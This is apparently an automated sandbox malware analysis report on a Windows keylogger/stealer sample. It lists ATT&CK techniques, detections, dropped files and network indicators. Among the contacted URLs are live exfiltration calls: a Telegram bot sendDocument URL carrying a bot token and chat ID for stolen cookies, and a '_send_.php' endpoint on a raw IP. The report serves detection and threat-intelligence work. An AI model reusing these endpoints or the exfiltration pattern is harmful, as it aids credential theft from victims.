Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	25 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
FT876567090.exe	74%	ReversingLabs	Win32.Exploit.Generic
FT876567090.exe	100%	Avira	HEUR/AGEN.1305388
FT876567090.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	100%	Avira	HEUR/AGEN.1305388
C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	74%	ReversingLabs	Win32.Exploit.Generic

Source	Detection	Scanner	Label
https://reallyfreegeoip.orgrd	0%	Avira URL Cloud	safe
http://mail.vvtrade.vn	0%	Avira URL Cloud	safe
http://checkip.ds	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
ax-0001.ax-msedge.net	150.171.28.10	true	false	high
mail.vvtrade.vn	118.69.190.131	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20and%20Time:%2017/12/2024%20/%2010:57:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20992547%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20and%20Time:%2017/12/2024%20/%2013:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20992547%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003564000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en8u	FT876567090.exe, 0000000A.00000002.3392046185.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	FT876567090.exe, 0000000A.00000002.3392046185.000000000310C000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.0000000003239000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000359F000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000359F000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	FT876567090.exe, 0000000A.00000002.3392046185.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000355F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	FT876567090.exe, 0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FT876567090.exe, 0000000A.00000002.3397710460.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3397710460.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	FT876567090.exe, 0000000A.00000002.3392046185.000000000310C000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003533000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003564000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000352E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	FT876567090.exe, 0000000A.00000002.3397710460.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3397710460.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443	EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000359F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.orgrd	EYDNKhhJr.exe, 0000000F.00000002.3390924672.00000000033F3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	FT876567090.exe, 0000000A.00000002.3397710460.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20a	FT876567090.exe, 0000000A.00000002.3392046185.000000000310C000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003488000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	FT876567090.exe, 0000000A.00000002.3392046185.0000000003229000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000358F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.vvtrade.vn	FT876567090.exe, 0000000A.00000002.3392046185.0000000003239000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000358F000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000359F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/8u	FT876567090.exe, 0000000A.00000002.3392046185.00000000031EF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	FT876567090.exe, 0000000A.00000002.3397710460.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3397710460.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	FT876567090.exe, 0000000A.00000002.3392046185.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	FT876567090.exe, 0000000A.00000002.3392046185.000000000309D000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.000000000310C000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000341C000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003461000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	FT876567090.exe, 0000000A.00000002.3392046185.0000000003073000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.000000000310C000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003461000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003488000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	FT876567090.exe, 0000000A.00000002.3392046185.0000000003239000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000359F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FT876567090.exe, 00000000.00000002.2179357230.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000C.00000002.2212573177.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FT876567090.exe, 0000000A.00000002.3397710460.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004451000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.ds	FT876567090.exe, 0000000A.00000002.3388595176.0000000001127000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.0000000003073000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.00000000033F3000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
118.69.190.131	mail.vvtrade.vn	Viet Nam	18403	FPT-AS-APTheCorporationforFinancingPromotingTechnolo	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576083
Start date and time:	2024-12-16 14:22:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FT876567090.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 216 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.223.35.26, 20.190.177.84, 23.218.208.109, 13.107.246.63, 2.16.158.57, 4.175.87.197, 150.171.28.10, 2.16.158.26, 20.12.23.50
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, arc.trafficmanager.net, iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: FT876567090.exe

Simulations

Behavior and APIs

Time	Type	Description
08:23:04	API Interceptor	1375370x Sleep call for process: FT876567090.exe modified
08:23:07	API Interceptor	34x Sleep call for process: powershell.exe modified
08:23:09	API Interceptor	1031431x Sleep call for process: EYDNKhhJr.exe modified
14:23:09	Task Scheduler	Run new task: EYDNKhhJr path: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.67.152	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse
118.69.190.131	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TEKJ09876545678002.cmd.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	NEW ORDER QUOTATION REQUEST.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Request for Q uotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FSVB098765600900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FDST69876500900.cmd.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	GYJ1zSOpOW.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
158.101.44.242	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	hesaphareketi-01.pdfsxlx..exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request for Quotation_10.12.2024.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.vvtrade.vn	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	TEKJ09876545678002.cmd.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	NEW ORDER QUOTATION REQUEST.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	Request for Q uotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	FSVB098765600900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	FDST69876500900.cmd.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
	GYJ1zSOpOW.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	118.69.190.131
reallyfreegeoip.org	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	172.67.177.134
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
api.telegram.org	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	149.154.167.220
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	149.154.167.220
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	gjvU5KOFhX.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
ax-0001.ax-msedge.net	https://t.co/eSJUUrWOcO	Get hash	malicious	HTMLPhisher	Browse	150.171.27.10
	Payment_swift_copy.xls	Get hash	malicious	Unknown	Browse	150.171.27.10
	InvoiceNr274728.pdf.lnk	Get hash	malicious	Unknown	Browse	150.171.28.10
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	150.171.28.10
	spectrum.exe	Get hash	malicious	Quasar	Browse	150.171.27.10
	USJFMdzoFi.doc	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=	Get hash	malicious	HTMLPhisher	Browse	150.171.27.10
	tnGNUbHCAK.doc	Get hash	malicious	Unknown	Browse	150.171.28.10
	test.exe	Get hash	malicious	Metasploit	Browse	150.171.27.10
	file.exe	Get hash	malicious	Credential Flusher	Browse	150.171.28.10

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
